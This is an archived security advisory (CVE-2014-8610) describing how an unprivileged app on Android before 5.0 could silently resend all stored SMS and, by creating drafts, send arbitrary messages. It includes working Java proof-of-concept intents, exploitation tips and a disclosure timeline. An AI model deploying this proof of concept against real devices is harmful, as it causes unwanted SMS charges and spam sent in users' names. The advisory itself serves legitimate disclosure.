what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Android SMS Resend

Android SMS Resend
Posted Nov 26, 2014
Authored by WangTao, Zhang Donghui, WangYu

Android versions prior to 5.0 allow an unprivileged application the ability to resend all the SMS's stored in the users phone.

tags | exploit
advisories | CVE-2014-8610
SHA-256 | 9954c7e735f97d8deaa62bdd4dd7a93cbbb3e11d2057e1ba006ba091a07683fc

Android SMS Resend

Change Mirror Download
INTRODUCTION
==================================
In Android <5.0, an unprivileged app can resend all the SMS stored in the user's phone to their corresponding recipients or senders (without user interaction).
No matter whether these SMS are sent to or received from other people. This may leads to undesired cost to user.
Even the worse, since Android also allow unprivileged app to create draft SMS, combined with this trick, bad app can send any SMS without privilege requirement.

DETAILS
==================================
This vulnerability exists in the following source file of the Mms app:
https://android.googlesource.com/platform/packages/apps/Mms/+/android-4.4.4_r2.0.1/src/com/android/mms/transaction/SmsReceiverService.java
If bad app broadcast an intent with action "com.android.mms.transaction.MESSAGE_SENT", it will reach the method "handleSmsSent". If the bad app can also control the resultcode to be RESULT_ERROR_RADIO_OFF, then it will reach the following conditional branch, there the SMS (determined by uri ) will be moved to a queue to be resent:

private void handleSmsSent(Intent intent, int error) {
...
} else if ((mResultCode == SmsManager.RESULT_ERROR_RADIO_OFF) || (mResultCode == SmsManager.RESULT_ERROR_NO_SERVICE)) {
if (Log.isLoggable(LogTag.TRANSACTION, Log.VERBOSE)) {
Log.v(TAG, "handleSmsSent: no service, queuing message w/ uri: " + uri);
}
// We got an error with no service or no radio. Register for state changes so
// when the status of the connection/radio changes, we can try to send the
// queued up messages.
registerForServiceStateChanges();
// We couldn't send the message, put in the queue to retry later.
Sms.moveMessageToFolder(this, uri, Sms.MESSAGE_TYPE_QUEUED, error);
...

The POC code is as follows:

Intent intent= new Intent("com.android.mms.transaction.MESSAGE_SENT");
intent.setData(Uri.parse("content://sms"));
intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");
sendOrderedBroadcast(intent,null,null,null,SmsManager.RESULT_ERROR_RADIO_OFF,null,null);

Some tips about the POC:
1. uri is content://sms without specifying the ID, that means all the SMS will be resent.
2. must use explicit intent
3. with this version of sendOrderedBroadcast, the initial result code can be controlled

Normally, once the SMS is moved to the queue, it will be sent automatically!

But can we craft any SMS message? here is a trick:

Currently, any app can create a draft SMS without permission by a code snippet as follows:

Intent intent1 = new Intent("android.intent.action.SENDTO");
intent1.setData(Uri.parse("smsto:yourphonenumber"));
intent1.putExtra("sms_body", "another test sms1!");
startActivity(intent1);

After send the above intent, the app can wait for a short time then start another activity, this will cause ComposeMessageActivity in MMS app to call method onStop(), which will save the draft into database, which can be resent later. Thus we can craft any SMS message without permission requirement.

This has been fixed in android 5.0 (android bug id 17671795)
https://android.googlesource.com/platform/packages/apps/Mms/+/008d6202fca4002a7dfe333f22377faa73585c67

TIMELINE
==================================
26.09.2014 Initial report to Android Security Team with the POC
27.09.2014 Reply from Android Security Team "are looking into it"
30.09.2014 Find app can create draft and notify Android Security Team with a updated POC
02.10.2014 Reply from Android Security Team "We will fix this issue in the next major release"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, ask Android Security Team when this can be published
09.11.2014 Contact MITRE about this issue
20.11.2014 CVE-2014-8610 assigned
25.11.2014 Got Permission from Android Security Team to publish this
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8610
Android id 17671795

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=164


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close